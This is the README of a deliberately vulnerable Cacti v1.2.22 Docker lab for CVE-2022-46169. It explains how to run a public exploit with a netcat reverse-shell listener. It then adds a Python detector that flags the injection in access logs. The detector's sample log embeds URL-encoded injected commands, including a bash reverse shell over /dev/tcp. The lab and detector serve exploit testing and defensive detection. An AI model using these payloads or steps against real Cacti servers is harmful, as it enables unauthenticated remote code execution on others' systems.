## https://sploitus.com/exploit?id=03CA9591-67BF-5B9A-A0B3-247EAFACE864
# Cacti v1.2.22 command injection (CVE-2022-46169) vulnerable application

This is a vulnerable application to test the exploit for the **Cacti** vulnerability (**CVE-2022-46169**).

## WARNING!

**This application contains serious security vulnerabilities. Run it at your own risk! It is recommended to use a backed-up and isolated environment (such as a VM with a recent snapshot and host-only networking). Do not deploy this application on any Internet-facing server: it will be compromised.**

***DISCLAIMER*: I do not take responsibility for the way in which anyone uses this application. The only purpose of this application is to be a test scenario for the CVE-2022-46169 exploit and it should not be used maliciously. If your server is compromised via an installation of this application it is not my responsibility; it is the responsibility of the person(s) who uploaded and installed it.**

## Vulnerability info

* **CVE-ID**: CVE-2022-46169
* **Link**: [https://vulners.com/cve/CVE-2022-46169](https://vulners.com/cve/CVE-2022-46169)
* **Description**: In affected versions a command injection vulnerability allows an unauthenticated user to execute arbitrary code on a server running Cacti, if a specific data source was selected for any monitored device. In this lab, that precondition is satisfied by creating the *Device - Uptime* graph during setup (see below).

## Usage

Here are the steps to **set up** the environment:
1. Launch `docker compose up -d` to start the composition.
2. Finalize the setup by browsing to [http://127.0.0.1/cacti](http://127.0.0.1/cacti) to start the Cacti initialization wizard. If you get an error referring to the database, wait a little and refresh the page: the database container may still be initializing.
3. Default credentials are `admin`/`admin`.
4. Press "*Next*" through all the wizard pages, choosing options as needed. The defaults should be fine and all the mandatory prerequisites should already be satisfied.
5. After the installation, you have to set up a new graph (this is what makes the instance exploitable):
    1. Click on "[*Create graphs*](http://127.0.0.1/cacti/graphs_new.php)".
    2. Under the "*Graph Templates*" section, in the dropdown menu near "*Create*", select: "*Device - Uptime*".
    3. Press the "*Create*" button.

The container will be called `vuln-cacti`.

To **tear down** the environment use the `docker compose down` command.

The official installation guide of Cacti can be found [here](https://docs.cacti.net/README.md#cacti-installation).

## Root cause

A detailed root cause of the vulnerability is available [here](https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf).

## Exploit

A public exploit is available on [Exploit-DB](https://www.exploit-db.com/exploits/51166). It has been copied under the `exploit/` folder for simplicity.

To run it:
1. Use netcat on the host machine to listen for the incoming reverse-shell connection.
    ```
    nc -lvp 6669
    ```
2. Launch the exploit.
    ```
    ./exploit/exploit.py -u http://127.0.0.1/cacti/ -i host.docker.internal -p 6669
    ```
    Tip: `host.docker.internal` is used to reach the host machine from the container ([reference](https://stackoverflow.com/questions/31324981/how-to-access-host-port-from-docker-container)).
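Once the exploit has run against the lab, it is worth looking at what it left in the web server's access log. The following is an added example (not part of this repository nor of the Exploit-DB script): a small detector that scans Apache "combined"-format log lines for the request shape described in the linked Cacti advisory, an unauthenticated `GET` to `remote_agent.php` with `action=polldata` whose `poller_id` parameter ends up on a shell command line. A legitimate `poller_id` is a plain integer, so anything else on that code path is flagged as an injection attempt. The log lines, source IPs, user agents and reverse-shell payloads in `SAMPLE_LOG` are constructed for the example.

```python
"""Flag CVE-2022-46169 exploitation attempts in Cacti access logs.

Added example for this lab. Assumes Apache "combined" log format and the
request shape from the Cacti advisory (GHSA-6p93-p743-35gf):
GET /remote_agent.php?action=polldata&poller_id=<injected>&host_id=..&local_data_ids[]=..
"""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample log (not real traffic). Line 2 and line 4 carry
# URL-encoded shell metacharacters in poller_id; line 1 is a well-formed
# polldata request; line 3 is unrelated.
SAMPLE_LOG = """\
172.18.0.1 - - [10/Jan/2023:10:00:01 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
172.18.0.1 - - [10/Jan/2023:10:00:02 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=%3Bbash%20-c%20%27bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F10.0.0.5%2F6669%200%3E%261%27&host_id=1&local_data_ids[]=6 HTTP/1.1" 200 512 "-" "python-requests/2.28.1"
172.18.0.1 - - [10/Jan/2023:10:00:03 +0000] "GET /cacti/graphs_new.php HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
172.18.0.1 - - [10/Jan/2023:10:00:04 +0000] "GET /cacti/remote_agent.php?action=polldata&poller_id=1%60id%60&host_id=2&local_data_ids[]=7 HTTP/1.1" 200 12 "-" "curl/7.85.0"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# A legitimate poller_id is a plain positive integer.
SAFE_POLLER_ID = re.compile(r'^\d+$')


def parse_line(line):
    """Parse one combined-format log line; return None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group('target'))
    return {
        'src': m.group('src'),
        'ts': m.group('ts'),
        'method': m.group('method'),
        'path': parts.path,
        # parse_qs percent-decodes values, so %3B becomes ';' here.
        'query': parse_qs(parts.query, keep_blank_values=True),
        'status': int(m.group('status')),
    }


def classify(entry):
    """Return 'exploit', 'probe' or None for a parsed entry.

    'probe'   : polldata request with a well-formed poller_id. Real remote
                pollers send these, but on a single-poller lab like this one
                any such request is worth a look.
    'exploit' : poller_id is not a bare integer, i.e. the caller is injecting
                into the poller command line.
    """
    if entry is None or not entry['path'].endswith('/remote_agent.php'):
        return None
    q = entry['query']
    if q.get('action', [''])[0] != 'polldata':
        return None
    poller_id = q.get('poller_id', [''])[0]
    return 'probe' if SAFE_POLLER_ID.match(poller_id) else 'exploit'


def scan(log_text):
    """Scan a whole log and return one finding per flagged request."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        entry = parse_line(line)
        verdict = classify(entry)
        if verdict:
            q = entry['query']
            findings.append({
                'line': lineno,
                'verdict': verdict,
                'src': entry['src'],
                'poller_id': q.get('poller_id', [''])[0],
                'host_id': q.get('host_id', [''])[0],
                'local_data_ids': q.get('local_data_ids[]', []),
            })
    return findings


if __name__ == '__main__':
    for f in scan(SAMPLE_LOG):
        print(f"line {f['line']}: {f['verdict']:7s} src={f['src']} "
              f"host_id={f['host_id']} poller_id={f['poller_id']!r}")
```

Note that the other half of the bug, the authentication bypass via a spoofed `X-Forwarded-For` header, is not visible in a default access log; to catch it you would need to log that header (or the value Cacti resolves as the client address) as well. Inside the lab, the Apache log of the `vuln-cacti` container can be fed to `scan()` after running the exploit.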

There is also an entry in [*vulhub* repository](https://github.com/vulhub/vulhub/tree/master/cacti/CVE-2022-46169).

## Authors

* **Antonio Francesco Sardella** - *implementation* - [m3ssap0](https://github.com/m3ssap0)

## License

This project is licensed under the Unlicense - see the **LICENSE** file for details.

## Acknowledgments

* [Stefan Schiller](https://github.com/stefan-schiller-sonarsource), the security researcher who discovered the vulnerability.
* [Riadh Bouchahoua](https://www.exploit-db.com/exploits/51166), the exploit developer.